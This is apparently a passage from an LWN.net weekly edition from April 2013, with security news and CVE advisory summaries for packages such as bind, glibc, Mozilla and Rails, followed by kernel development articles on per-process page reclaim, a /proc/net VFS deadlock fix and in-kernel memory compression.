One might reasonably argue that anybody who willingly enables FTP Upload or DLNA mode on his or her camera has no expectation of privacy; after all, photojournalists (especially those in dangerous locations) already know how important protecting their data is. For a few people such a risk might endanger their safety; for most others only their livelihood is at stake. Consider the paparazzi mentioned in the talk title, among whom being the first to bring back pictures of an event or an infant with the right parents can be worth tens of thousands. The second paparazzo to bring back the coveted picture might have a hard time proving that the first actually stole them over the network and altered the Exif data.

For open source developers, the findings in this talk offer some words of caution. Users of aftermarket firmware like CHDK or Magic Lantern need to protect their users even if Canon and Nikon do not. On the other hand, weak authentication probably makes it easier to reverse engineer the undocumented protocols often found in these cameras, so users of tethered shooting applications may actually see some benefits somewhere down the line. For the rest of the camera-buying public, though, the take-away is that cameras are just as exploitable as every other consumer electronics gadget on the network. So in 2012, celebrities and politicians may have gotten their phones hacked, but in 2013 their cameras may well be the target. The risks are exactly the same, but at least the pictures will be sharper and perhaps sport better noise-reduction.

Comments (none posted)

Brief items

Security quotes of the week

The password can't contain obscene language.
-- AT&T goes a bit overboard (as reported by ars technica)

So what is the solution to the copyright wars? It's the same solution we need to the press-regulation wars, to the war on terror, to the surveillance wars, to the pornography wars: to acknowledge that the internet is the nervous system of the information age, and that preserving its integrity and freedom from surveillance, censorship and control is the essential first step to securing every other desirable policy goal.
-- Cory Doctorow

GPS always reports you at the GooglePlex
Contacts list shows Justin Beiber as your only friend
Outbound packets over cell network should require visual inspection and confirmation
[...]
Continuous face detection - if non-owner detected, explode phone
-- Steve Kondik (aka Cyanogen) has some ideas for a secret agent Android fork

Comments (4 posted)

PostgreSQL security update coming April 4

The PostgreSQL project has announced an update coming on April 4. "This release will include a fix for a high-exposure security vulnerability. All users are strongly urged to apply the update as soon as it is available." Pre-announcement of security updates is quite rare, as is the associated shutdown of repository updates and distribution of commit messages, so one assumes that it would be a good idea to be ready to apply this update when it arrives.

Full Story (comments: 3)

New vulnerabilities

389-ds-base: information exposure

Package(s):389-ds-base CVE #(s):CVE-2013-1897
Created:April 3, 2013 Updated:June 13, 2013
Description: From the Red Hat bugzilla:

It was found that the 389 Directory Server did not properly restrict access to entries when the 'nsslapd-allow-anonymous-access' configuration setting is set to 'rootdse'. An anonymous user could connect to the LDAP database and, if the search scope is set to BASE, obtain access to information outside of the rootDSE. The 'rootdse' option exists to provide anonymous access to the rootDSE but no other entries in the directory. An administrator could believe that directory entries are being restricted with this option enabled, however the information provided would be the same as if 'nsslapd-allow-anonymous-access' were set to 'on'.

ACI's are still properly evaluated despite this flaw, so this can easily be mitigated by removing the anonymous read ACL.

Alerts:
Fedora FEDORA-2013-5349 389-ds-base 2013-06-13
Oracle ELSA-2013-0742 389-ds-base 2013-04-15
Scientific Linux SL-389--20130415 389-ds-base 2013-04-15
CentOS CESA-2013:0742 389-ds-base 2013-04-16
Red Hat RHSA-2013:0742-01 389-ds-base 2013-04-15
Fedora FEDORA-2013-4460 freeipa 2013-04-11
Fedora FEDORA-2013-4578 389-ds-base 2013-04-03

Comments (none posted)

bind: denial of service

Package(s):bind CVE #(s):CVE-2013-2266
Created:March 29, 2013 Updated:April 8, 2013
Description:

From the Red Hat advisory:

A denial of service flaw was found in the libdns library. A remote attacker could use this flaw to send a specially-crafted DNS query to named that, when processed, would cause named to use an excessive amount of memory, or possibly crash. (CVE-2013-2266)

Alerts:
Oracle ELSA-2014-1244 bind97 2014-09-17
Gentoo 201401-34 bind 2014-01-29
Oracle ELSA-2014-0043 bind 2014-01-20
openSUSE openSUSE-SU-2013:0666-1 bind 2013-04-11
Mandriva MDVSA-2013:059 dhcp 2013-04-08
Mageia MGASA-2013-0105 bind 2013-04-04
openSUSE openSUSE-SU-2013:0620-1 dhcp 2013-04-04
openSUSE openSUSE-SU-2013:0619-1 dhcp 2013-04-04
openSUSE openSUSE-SU-2013:0605-1 bind 2013-04-03
Debian DSA-2656-1 bind9 2013-03-30
Ubuntu USN-1783-1 bind9 2013-03-29
Scientific Linux SL-bind-20130329 bind97 2013-03-29
Scientific Linux SL-bind-20130329 bind 2013-03-29
Oracle ELSA-2013-0690 bind97 2013-03-29
Oracle ELSA-2013-0689 bind 2013-03-28
CentOS CESA-2013:0690 bind97 2013-03-28
CentOS CESA-2013:0689 bind 2013-03-29
Red Hat RHSA-2013:0690-01 bind97 2013-03-28
Red Hat RHSA-2013:0689-01 bind 2013-03-28
Mandriva MDVSA-2013:058 bind 2013-04-08
Fedora FEDORA-2013-4533 bind 2013-04-07
Fedora FEDORA-2013-4525 bind 2013-04-05
openSUSE openSUSE-SU-2013:0625-1 dhcp 2013-04-04

Comments (none posted)

drupal7-views: cross-site scripting

Package(s):drupal7-views CVE #(s):CVE-2013-1887
Created:April 1, 2013 Updated:April 3, 2013
Description: From the Drupal advisory:

The Views module provides a flexible method for Drupal site designers to control how lists and tables of content, users, taxonomy terms and other data are presented.

The module incorrectly prints some view configuration fields without proper sanitization opening a Cross-Site Scripting vulnerability.

The vulnerability is mitigated by the fact that an attacker must have a role with the permission "Administer vocabularies and terms" or other administer-related permissions from contributed modules that integrate with Views.

Alerts:
Fedora FEDORA-2013-4134 drupal7-views 2013-03-30
Fedora FEDORA-2013-4215 drupal7-views 2013-03-30

Comments (none posted)

gajim: man-in-the-middle attack

Package(s):gajim CVE #(s):CVE-2012-5524
Created:April 1, 2013 Updated:January 7, 2014
Description: From the Red Hat bugzilla:

A security flaw was found in the way Gajim, a Jabber client written in PyGTK, performed verification of invalid (broken / expired) x.509v3 SSL certificates (True as return value was returned always regardless if error during certificate validation occurred or not). A rogue XMPP server could use this flaw to conduct man-in-the-middle attack (MiTM) and trick Gajim client to accept the certificate even when it was invalid / should not be accepted.

Alerts:
Gentoo 201401-02 gajim 2014-01-06
Fedora FEDORA-2013-4210 gajim 2013-03-30
Fedora FEDORA-2013-4205 gajim 2013-03-30
Mageia MGASA-2013-0111 gajim 2013-04-06

Comments (none posted)

glibc: denial of service

Package(s):glibc CVE #(s):CVE-2013-0242
Created:April 1, 2013 Updated:June 3, 2013
Description: From the CVE entry:

Buffer overflow in the extend_buffers function in the regular expression matcher (posix/regexec.c) in glibc, possibly 2.17 and earlier, allows context-dependent attackers to cause a denial of service (memory corruption and crash) via crafted multibyte characters.

Alerts:
Debian-LTS DLA-165-1 eglibc 2015-03-06
Gentoo 201503-04 glibc 2015-03-08
SUSE SUSE-SU-2014:1128-1 glibc 2014-09-15
SUSE SUSE-SU-2014:1122-1 glibc 2014-09-12
Scientific Linux SLSA-2013:1605-2 glibc 2013-12-03
Oracle ELSA-2013-1605 glibc 2013-11-26
Red Hat RHSA-2013:1605-02 glibc 2013-11-21
Ubuntu USN-1991-1 eglibc 2013-10-21
openSUSE openSUSE-SU-2013:1510-1 glibc 2013-09-30
Fedora FEDORA-2013-4174 glibc 2013-06-02
Mageia MGASA-2013-0141 glibc 2013-05-09
Mandriva MDVSA-2013:163 glibc 2013-05-07
Mandriva MDVSA-2013:162 glibc 2013-05-07
Scientific Linux SL-glib-20130425 glibc 2013-04-25
Oracle ELSA-2013-0769 glibc 2013-04-25
CentOS CESA-2013:0769 glibc 2013-04-24
Red Hat RHSA-2013:0769-01 glibc 2013-04-24
Fedora FEDORA-2013-4100 glibc 2013-03-30

Comments (none posted)

jenkins: man-in-the-middle attacks

Package(s):jenkins CVE #(s):CVE-2013-0253
Created:April 3, 2013 Updated:April 3, 2013
Description: From the Red Hat advisory:

It was found that all SSL certificate checking was disabled by default in the Apache Maven Wagon plug-in of Jenkins. This would make it easy for an attacker to perform man-in-the-middle attacks.

Alerts:
Red Hat RHSA-2013:0700-01 jenkins 2013-04-02

Comments (none posted)

libxslt: denial of service

Package(s):libxslt CVE #(s):CVE-2012-6139
Created:April 2, 2013 Updated:April 18, 2013
Description: From the Ubuntu advisory:

Nicholas Gregoire discovered that libxslt incorrectly handled certain empty values. If a user or automated system were tricked into processing a specially crafted XSLT document, a remote attacker could cause libxslt to crash, causing a denial of service.

Alerts:
Gentoo 201401-07 libxslt 2014-01-10
Fedora FEDORA-2013-4507 libxslt 2013-04-18
Mandriva MDVSA-2013:141 libxslt 2013-04-11
openSUSE openSUSE-SU-2013:0593-1 libxslt 2013-04-02
openSUSE openSUSE-SU-2013:0585-1 libxslt 2013-04-02
Ubuntu USN-1784-1 libxslt 2013-04-02
Mageia MGASA-2013-0107 libxslt 2013-04-04
Debian DSA-2654-1 libxslt 2013-04-03

Comments (none posted)

mantis: multiple vulnerabilities

Package(s):mantis CVE #(s):CVE-2013-0197 CVE-2013-1883
Created:April 1, 2013 Updated:April 3, 2013
Description: From the Red Hat bugzilla [1, 2]:

A denial of service flaw was found in the way MantisBT, a free popular web-based issue tracking system, performed processing of certain type of View Issues page search queries. A remote attacker could provide a specially-crafted query (filter combining some criteria and a text search with 'any condition') that, when processed by the MantisBT system, would lead to excessive system resources consumption (denial of service), possibly leading to complete MantisBT server instance unavailability. (CVE-2013-1883)

A persistent cross-site scripting (XSS) flaw was found in the way Mantis, a web-based issue tracking system, performed sanitization of the 'match_type' parameter. A remote attacker could provide a specially-crafted URL that, when processed by Mantis instance, would lead to arbitrary web script or HTML execution. (CVE-2013-0197)

Alerts:
Fedora FEDORA-2013-4335 mantis 2013-04-01
Fedora FEDORA-2013-4319 mantis 2013-04-01

Comments (none posted)

moodle: multiple vulnerabilities

Package(s):moodle CVE #(s):CVE-2013-1830 CVE-2013-1831 CVE-2013-1832 CVE-2013-1833 CVE-2013-1834 CVE-2013-1835 CVE-2013-1836
Created:April 3, 2013 Updated:April 3, 2013
Description: From the CVE entries:

user/view.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 does not enforce the forceloginforprofiles setting, which allows remote attackers to obtain sensitive course-profile information by leveraging the guest role, as demonstrated by a Google search. (CVE-2013-1830)

lib/setuplib.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allows remote attackers to obtain sensitive information via an invalid request, which reveals the absolute path in an exception message. (CVE-2013-1831)

repository/webdav/lib.php in Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 includes the WebDAV password in the configuration form, which allows remote authenticated administrators to obtain sensitive information by configuring an instance. (CVE-2013-1832)

Multiple cross-site scripting (XSS) vulnerabilities in the File Picker module in Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allow remote authenticated users to inject arbitrary web script or HTML via a crafted filename. (CVE-2013-1833)

notes/edit.php in Moodle 1.9.x through 1.9.19, 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allows remote authenticated users to reassign notes via a modified (1) userid or (2) courseid field. (CVE-2013-1834)

Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allows remote authenticated administrators to obtain sensitive information from the external repositories of arbitrary users by leveraging the login_as feature. (CVE-2013-1835)

Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 does not properly manage privileges for WebDAV repositories, which allows remote authenticated users to read, modify, or delete arbitrary site-wide repositories by leveraging certain read access. (CVE-2013-1836)

Alerts:
Fedora FEDORA-2013-4404 moodle 2013-04-03
Fedora FEDORA-2013-4387 moodle 2013-04-03

Comments (none posted)

mozilla: multiple vulnerabilities

Package(s):firefox thunderbird seamonkey CVE #(s):CVE-2013-0788 CVE-2013-0793 CVE-2013-0795 CVE-2013-0796 CVE-2013-0800
Created:April 3, 2013 Updated:June 3, 2013
Description: From the Red Hat advisory:

Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2013-0788)

A flaw was found in the way Same Origin Wrappers were implemented in Firefox. A malicious site could use this flaw to bypass the same-origin policy and execute arbitrary code with the privileges of the user running Firefox. (CVE-2013-0795)

A flaw was found in the embedded WebGL library in Firefox. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. Note: This issue only affected systems using the Intel Mesa graphics drivers. (CVE-2013-0796)

An out-of-bounds write flaw was found in the embedded Cairo library in Firefox. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2013-0800)

A flaw was found in the way Firefox handled the JavaScript history functions. A malicious site could cause a web page to be displayed that has a baseURI pointing to a different site, allowing cross-site scripting (XSS) and phishing attacks. (CVE-2013-0793)

Alerts:
openSUSE openSUSE-SU-2014:1100-1 Firefox 2014-09-09
Gentoo 201309-23 firefox 2013-09-27
openSUSE openSUSE-SU-2013:1180-1 seamonkey 2013-07-11
SUSE SUSE-SU-2013:1152-1 Mozilla Firefox 2013-07-05
Debian DSA-2699-1 iceweasel 2013-06-02
SUSE SUSE-SU-2013:0850-1 Mozilla Firefox 2013-05-31
SUSE SUSE-SU-2013:0843-1 Mozilla Firefox 2013-05-28
SUSE SUSE-SU-2013:0842-1 Mozilla Firefox 2013-05-28
openSUSE openSUSE-SU-2013:0875-1 seamonkey 2013-06-10
Mageia MGASA-2013-0120 iceape 2013-04-18
Fedora FEDORA-2013-4983 seamonkey 2013-04-16
Fedora FEDORA-2013-4957 seamonkey 2013-04-15
Mandriva MDVSA-2013:087 firefox 2013-04-09
Slackware SSA:2013-097-01 seamonkey 2013-04-07
openSUSE openSUSE-SU-2013:0631-1 Mozilla 2013-04-05
Fedora FEDORA-2013-4832 xulrunner 2013-04-05
Fedora FEDORA-2013-4832 thunderbird 2013-04-05
Oracle ELSA-2013-0696 firefox 2013-04-03
CentOS CESA-2013:0697 thunderbird 2013-04-03
CentOS CESA-2013:0697 thunderbird 2013-04-03
CentOS CESA-2013:0696 firefox 2013-04-03
CentOS CESA-2013:0696 firefox 2013-04-03
CentOS CESA-2013:0696 xulrunner 2013-04-03
CentOS CESA-2013:0696 xulrunner 2013-04-03
Slackware SSA:2013-093-02 thunderbird 2013-04-03
Slackware SSA:2013-093-01 firefox 2013-04-03
Scientific Linux SL-thun-20130402 thunderbird 2013-04-02
Scientific Linux SL-fire-20130402 firefox 2013-04-02
Oracle ELSA-2013-0697 thunderbird 2013-04-02
Red Hat RHSA-2013:0697-01 thunderbird 2013-04-02
Red Hat RHSA-2013:0696-01 firefox 2013-04-02
Mageia MGASA-2013-0109 thunderbird 2013-04-04
SUSE SUSE-SU-2013:0645-1 Mozilla Firefox 2013-04-08
Ubuntu USN-1791-1 thunderbird 2013-04-08
Ubuntu USN-1786-2 USN-1786-1 fixed 2013-04-04
Ubuntu USN-1786-1 firefox 2013-04-04
Fedora FEDORA-2013-4832 firefox 2013-04-05
Mageia MGASA-2013-0108 firefox 2013-04-04
openSUSE openSUSE-SU-2013:0630-1 Mozilla 2013-04-05
Oracle ELSA-2013-0696 firefox 2013-04-03

Comments (none posted)

rails: multiple vulnerabilities

Package(s):rails CVE #(s):CVE-2013-1854 CVE-2013-1855 CVE-2013-1857
Created:March 29, 2013 Updated:April 11, 2013
Description:

From the CVE database:

The Active Record component in Ruby on Rails 2.3.x before 2.3.18, 3.1.x before 3.1.12, and 3.2.x before 3.2.13 processes certain queries by converting hash keys to symbols, which allows remote attackers to cause a denial of service via crafted input to a where method. (CVE-2013-1854)

The sanitize_css method in lib/action_controller/vendor/html-scanner/html/sanitizer.rb in the Action Pack component in Ruby on Rails before 2.3.18, 3.0.x and 3.1.x before 3.1.12, and 3.2.x before 3.2.13 does not properly handle \n (newline) characters, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via crafted Cascading Style Sheets (CSS) token sequences. (CVE-2013-1855)

The sanitize helper in lib/action_controller/vendor/html-scanner/html/sanitizer.rb in the Action Pack component in Ruby on Rails before 2.3.18, 3.0.x and 3.1.x before 3.1.12, and 3.2.x before 3.2.13 does not properly handle encoded : (colon) characters in URLs, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted scheme name, as demonstrated by including a : sequence. (CVE-2013-1857)

Alerts:
Gentoo 201412-28 rails 2014-12-14
openSUSE openSUSE-SU-2014:0019-1 rubygem-actionpack-2_3 2014-01-03
openSUSE openSUSE-SU-2013:0661-1 rubygem-actionpack-3_2 2013-04-10
openSUSE openSUSE-SU-2013:0667-1 rubygem-activerecord-2_3 2013-04-11
openSUSE openSUSE-SU-2013:0659-1 rubygem-activerecord-3_2 2013-04-10
openSUSE openSUSE-SU-2013:0664-1 rubygem-activesupport-2_3 2013-04-10
openSUSE openSUSE-SU-2013:0668-1 rubygem-activesupport-2_3 2013-04-11
openSUSE openSUSE-SU-2013:0662-1 rubygem-actionpack-2_3 2013-04-10
openSUSE openSUSE-SU-2013:0660-1 rubygem-activerecord-2_3 2013-04-10
Red Hat RHSA-2013:0699-01 ruby193-rubygem-activerecord 2013-04-02
Red Hat RHSA-2013:0698-01 rubygem-actionpack 2013-04-02
Fedora FEDORA-2013-4139 rubygem-activerecord 2013-03-30
Fedora FEDORA-2013-4199 rubygem-actionpack 2013-03-30
Fedora FEDORA-2013-4214 rubygem-actionpack 2013-03-30
Debian DSA-2655-1 rails 2013-03-28

Comments (none posted)

rubygem-activesupport: XML parsing vulnerability

Package(s):rubygem-activesupport CVE #(s):CVE-2013-1856
Created:April 1, 2013 Updated:April 3, 2013
Description: From the Red Hat bugzilla:

XML Parsing Vulnerability affecting JRuby users

There is a vulnerability in the JDOM backend to ActiveSupport's XML parser. This could allow an attacker to perform a denial of service attack or gain access to files stored on the application server. This vulnerability has been assigned the CVE identifier CVE-2013-1856.

Versions Affected: 3.0.0 and All Later Versions when using JRuby Not affected: Applications not using JRuby or JRuby applications not using the JDOM backend. Fixed Versions: 3.2.13, 3.1.12

Alerts:
Gentoo 201412-28 rails 2014-12-14
Fedora FEDORA-2013-4130 rubygem-activesupport 2013-03-30
Fedora FEDORA-2013-4198 rubygem-activesupport 2013-03-30

Comments (none posted)

Page editor: Jake Edge

Kernel development

Brief items

Kernel release status

The current development kernel is 3.9-rc5, released on March 31. Linus says: "Nothing really peculiar stands out. Exynos DRM updates, IBM RamSan driver updates are a bit larger, l2tp update... The rest is pretty much small patches spread out all over. Mostly drivers (block, net, media, tty, usb), networking, and some filesystem updates (btrfs, nfs). Some arch updates (x86, arc). Things seem to be calming down a bit, and everything seems largely on track for a 3.9 release in a few weeks."

Stable updates: 3.8.5, 3.4.38, and 3.0.71 were released on March 28 with the usual set of fixes. 3.5.7.9 was also released on the 28th. Another big set of fixes is coming with 3.8.6, 3.4.39, and 3.0.72, which are due on or after April 4.

Comments (none posted)

Quotes of the week

It would be nice if we can avoid the feature-removal.txt step. I mean, I heard some doleful whispers once when my pointer selected that file. Instead of opening the file I just closed the directory instantly. I never told anybody about that before, this is the first time. I also heard that somebody added an entry to that file to schedule the removal of that file? This is devilry.
Frederic Weisbecker

< system in single state : everyone sees cat = alive >

insert_into_box(cat);

< system in dual state : new calls see cat == dead, but
  current calls see cat == alive >

open_box();

< system is back to single state: everyone sees cat = dead >

funeral(cat);
Steven Rostedt explains RCU

Comments (none posted)

ZFS on Linux 0.6.1

On behalf of the ZFS-on-Linux project, Brian Behlendorf has announced the availability of version 0.6.1 of this Solaris-derived filesystem. "Over two years of use by real users has convinced us ZoL is ready for wide scale deployment on everything from desktops to super computers." The project's home page offers binary modules for a wide variety of distributions. (See the FAQ for the project's take on licensing issues.)

Comments (17 posted)

Kernel development news

Avoiding game-score loss with per-process reclaim

By Michael Kerrisk
April 3, 2013

Minchan Kim's recent patch series to provide user-space-triggered reclaim of a process's pages represents one more point in a spectrum that increasingly sees memory management on Linux as a task that is indirectly influenced or even directly controlled from user space.

Approaches such as Android's low-memory killer represent one end of the page-reclaim spectrum, where memory management is primarily under kernel control. When memory is low, the low-memory killer picks a victim process and kills it outright; applications that live in such an environment have to work with the possibility that they may disappear from one moment to the next. As Minchan pointed out via an amusing example, the effects of the low-memory killer's approach to page reclaim can be extreme:

[Having a process killed to free memory] was really terrible experience because I lost my best score of game I had ever after I switch the phone call while I enjoyed the game

Jon Stultz's volatile ranges work and Minchan's own work on a similar feature (both described in this article) represent a middle point in the spectrum. The volatile ranges approach, inspired by Android's ashmem, provides a process with a way to inform the kernel that a certain range of its own virtual address space can be preferentially reclaimed if memory pressure is high. Under this approach, the kernel takes no responsibility for the contents of the reclaimed pages: if the kernel needs the memory, the page contents are discarded, and it is assumed that the application has sufficient information available to re-create those pages with the right contents if they are needed. As with the low-memory killer, the decision about if and when to reclaim the pages remains with the kernel.

By contrast, Minchan's patch set places the decision about when to reclaim pages directly under the control of user space. The interface provided by these patches is simple. A /proc/PID/reclaim file is provided for each process. A process with suitable permissions—that is, a process owned by root or one with the same user ID as the process PID—can write one of the following values to the file, to cause some or all of the process's pages to be reclaimed:

  1. Reclaim all process pages in file-backed mappings.
  2. Reclaim all process pages in anonymous (MAP_ANONYMOUS) mappings.
  3. Reclaim all pages of the process (i.e., the combination of 1 and 2).

As currently implemented, all of the process's pages that match the specified criterion are reclaimed. Your editor wondered whether there might be benefit in allowing some control over the range of pages that are reclaimed from the target process, by allowing an address range to be written to the /proc/PID/reclaim file.

By contrast with volatile ranges and the low-memory killer, modifications in pages reclaimed via /proc/PID/reclaim are not lost. Modified pages are written to the underlying file in the case of shared (MAP_SHARED) file mappings or to swap in other cases. Thus, if the process touches the reclaimed page later, it will be faulted into memory with the contents at the time it was reclaimed. The patches also include some logic to handle the case where multiple processes are sharing the same pages; in that case, the pages are reclaimed only after all of the processes have marked them for reclaim. Like the low-memory killer, /proc/PID/reclaim can be used to reclaim all of the pages in a process, but without needing to kill the process to do so.

The idea behind Minchan's proposal is that a user-space task manager could take over some part of the job of memory management. In some cases, this may be more effective than allowing the kernel to make memory-management decisions, since the user-space task manager can bring application-specific intelligence to decisions about whether to reclaim a process's pages. For example, some application processes may be in the foreground while others are in the background. It may desirable to preferentially reclaim pages from one of the background processes, even if it has some frequently accessed pages. Of course, the task manager would somehow need to know when the system is under memory pressure. To that end, a mechanism like Anton Vorontsov's proposed vmpressure_fd() API might be useful.

Minchan's patches apply against Michal Hocko's MMOTM (memory management of the moment) tree. The patches came out on March 25, but have so far seen little review. Nevertheless, they present an idea that will probably be of particular interest for the developers of mobile and embedded devices and thus it seems likely that they will get some attention at some point in the future.

Comments (4 posted)

A VFS deadlock post-mortem

By Michael Kerrisk
April 3, 2013

Dave Jones continues to exercise his Trinity fuzz tester and uncover interesting bugs in kernel code. One recent find was a long-standing bug in the implementation of network namespaces.

The discussion of the bug began when Dave posted a note to the linux-kernel mailing list with stack traces that showed a kernel deadlock in the VFS code. Dave's report prompted Al Viro to wonder how a Trinity instance was managing to sit blocked on two locks (a situation that should never be able to happen), as shown in the lockdep output posted by Dave (the output has some key pieces highlighted):

    Showing all locks held in the system:
    4 locks on stack by trinity-child2/7669:
     #0: blocked:  (sb_writers#4){.+.+.+}, 
         instance: ffff8801292d17d8, at: [<ffffffff811df134>] mnt_want_write+0x24/0x50
     #1: held:     (&type->s_vfs_rename_key){+.+.+.}, 
         instance: ffff8801292d1928, at: [<ffffffff811c6f5e>] lock_rename+0x3e/0x120
     #2: held:     (&type->i_mutex_dir_key#2/1){+.+.+.}, 
         instance: ffff880110b3a858, at: [<ffffffff811c701e>] lock_rename+0xfe/0x120
     #3: blocked:  (&type->i_mutex_dir_key#2/2){+.+.+.}, 
         instance: ffff880110b3a858, at: [<ffffffff811c7034>] lock_rename+0x114/0x120

Al also noted that the output suggested that a directory inode in the inode cache was mapped by two different dentries, since lockdep showed two i_mutex_dir_key locks on the same address. A dentry (directory entry) is a data structure representing a filename in the kernel directory entry cache (dcache); a brief overview of dentries and the dcache can be found in this article. As will become clear shortly, it should normally never happen that a directory inode is mapped twice in the dcache.

Some suggestions ensued regarding suitable debugging statements to add to the kernel's lock_rename() function to further investigate the problem. In particular, when two locks were held on the same inode address, Linus wanted to see the filenames corresponding to the inode and Al was interested to know the name of the filesystem holding the two inodes.

Further runs of Trinity with those debugging statements in place revealed that the locks in question were occurring for various entries under the /proc tree. At that point Linus refined the observation to note that the entries in question were for directories under /proc/net, but, like Al, he was puzzled as to how that could occur.

Here, a little background is probably in order. Once upon a time, /proc/net was single directory. But, with the invention of network namespaces, it is now a symbolic link to the /proc/self/net directory; in other words, each process now has its own network-namespace-specific view of networking information under /proc.

With the output from the kernel debugging statements, the pieces started falling rapidly into place. Dave realized that he had started seeing the Trinity failure reports after he had enabled kernel namespaces support following a recent bug fix by Eric Biederman. Al began looking more closely at some of the subdirectories under the /proc/PID/net directories, and made an unhappy discovery:

    al <at> duke:~/linux/trees/vfs$ ls -lid /proc/{1,2}/net/stat
    4026531842 dr-xr-xr-x 2 root root 0 Mar 21 19:33 /proc/1/net/stat
    4026531842 dr-xr-xr-x 2 root root 0 Mar 21 19:33 /proc/2/net/stat

That discovery prompted a small explosion:

WE CAN NOT HAVE SEVERAL DENTRIES OVER THE SAME DIRECTORY INODE. […] Sigh... Namespace kinds - there should've been only one...

Those with a long memory, or at least careful attention when reading a recent LWN article, might smile with the realization that, to begin with and for many years thereafter, there was only one class of namespace—mount namespaces, as implemented by one Al Viro.

Humor aside, Al had discovered the origin of the problem. The directory listing above shows two directory entries linked to the same inode. More generally, for all of the processes that share a network namespace, each of the corresponding entries in /proc/PID/net is implemented as a hard link to the same (virtual) /proc file.

Implementing corresponding /proc entries as hard links to the same inode is a technique used in various places in the implementation of namespaces. Indeed, allowing multiple hard links to a file is a normal feature of UNIX-type systems. Except in one case: Linux, like other UNIX systems, forbids multiple hard links to a directory. The reliability of various pieces of kernel and user-space code is predicated on that assumption. However, a Linux 2.6.25 patch made early in the implementation of network namespaces set in train some changes that quietly broke the assumption for the directories under /proc/PID/net.

Having determined the cause of the problem, the developers then needed devise a suitable fix. At this point, pragmatic factors come into play, since the task is not only to fix the kernel going forward, but also going backward. In other words, the ideal solution would be one that could be applied not only to the current kernel source tree and but also to the stable and long-term kernel series. That led Linus to speculate about the possibility of allowing an exception to the rule that directory inodes are not allowed to have multiple links. Since the locks in question are placed at the inode level, why not change lock_rename() to replace the check on whether that function is dealing with the same dentries with a check on whether it is dealing with the same inodes?

However, Al was quick to point out that while modifying the check would solve the particular deadlock problem found by Dave, other problems would remain. The kernel code that deals with those locks depends upon a topological sort based on the hierarchical relationship between entries in the dcache; the presence of multiple directory entries that link to the same inode renders that sort unreliable.

Al went on to describe what he considered to be the full and proper solution: creating /proc/PID/net files as symbolic links to per-network-namespace directories of the form /proc/netns-ID/net, where netns-ID is a per-namespace identifier. Alternatively, the existing /proc/PID/net trees could be kept, but the subdirectories could be created as duplicate subtrees rather than hard links to a single directory subtree. Al was, however, unsure about the feasibility of implementing this solution as a patch that could be backported to past stable kernel series.

In the meantime, Linus came up with another proposal. proc_get_inode(), the kernel function for allocating inodes in the /proc filesystem, has the following form:

    struct inode *proc_get_inode(struct super_block *sb, struct proc_dir_entry *de)
    {
        struct inode *inode = iget_locked(sb, de->low_ino);

        if (inode && (inode->i_state & I_NEW)) {

            ...
            /* Populate fields in newly allocated cache entry pointed
               to by 'inode' */
               ...

            unlock_new_inode(inode);
        } else
            pde_put(de);
        return inode;
    }

The iget_locked() function searches the kernel's inode cache for an inode whose number corresponds to that recorded in the dentry structure de. It returns either a pointer to an existing entry, or, if no entry could be found, it allocates a new uninitialized cache entry that it returns to the caller. The proc_get_inode() function then populates the fields of the newly allocated inode cache entry using information from the dentry.

The deadlock problem is a result of the fact that—because multiple dentries map to the same inode—multiple locks may be placed on the same entry in the inode cache. Conversely, deadlocks could be avoided if it was possible to avoid placing multiple locks on the inode entries returned from the cache. As Linus noted, in the case of /proc files, it is not really necessary to find an existing entry in the cache, because there is no on-disk representation for the inodes under /proc. Instead, proc_get_inode() could simply always create a new cache entry via a call to new_inode_pseudo() and populate that cache entry. Since a new cache entry is always created, it will not be visible to any other process, so that there will be no possibility of lock conflicts and deadlocks. In other words, the logic of proc_get_inode() can be modified to be:

    struct inode *proc_get_inode(struct super_block *sb, struct proc_dir_entry *de)
    {
        struct inode *inode = new_inode_pseudo(sb);

        if (inode) {
            inode->i_ino = de->low_ino;

            ...
            /* Populate fields in newly allocated cache entry pointed
               to by 'inode' */
            ...

        } else
           pde_put(de);
        return inode;
    }

Here, it is worth noting that the kernel uses two different allocation schemes for the inodes under /proc: one scheme that is generally employed for inodes under the /proc/PID directories and another for the inodes in the remainder of /proc. Linus's patch affects only inode allocations for entries in the second category. However, as a consequence of the implementation history, whereby /proc/net was migrated to /proc/PID/net, the inodes under /proc/PID/net are allocated in the same fashion as inodes outside /proc/PID, and so the patch also affects those inodes.

In the subsequent commit message, Linus noted that the patch could have been refined so that the new behavior was applied only to directory entries, rather than all entries, under /proc. However, in the interests of keeping the change simple, no such differentiation was made.

The effect of Linus's patch is to prevent multiple locks (and thus deadlocks) on the same inode. Al agreed that the change should not be a problem from a correctness perspective. On the other hand, this change also has the effect of nullifying the benefits of inode caching for /proc files outside /proc/PID. Al wondered about the performance impact of that change. However, some casual instrumentation of the kernel suggested that the benefits of inode caching for /proc are low in any case. In addition, Dave reported that with the fix applied, Trinity was no longer hitting the deadlock problem.

Comments (none posted)

In-kernel memory compression

April 3, 2013

This article was contributed by Dan Magenheimer

Amdahl's law tells us that there is always a bottleneck in any computing system. Historically, the bottleneck in many workloads on many systems is the CPU and so system designers have made CPUs faster and more efficient and also continue to increase the number of CPU cores even in low-end systems. So now, increasingly, RAM is the bottleneck; CPUs wait idly while data is moved from disk to RAM and back again. Adding more RAM is not always a timely or cost-effective option and sometimes not an option at all. Faster I/O buses and solid-state disks reduce the bottleneck but don't eliminate it.

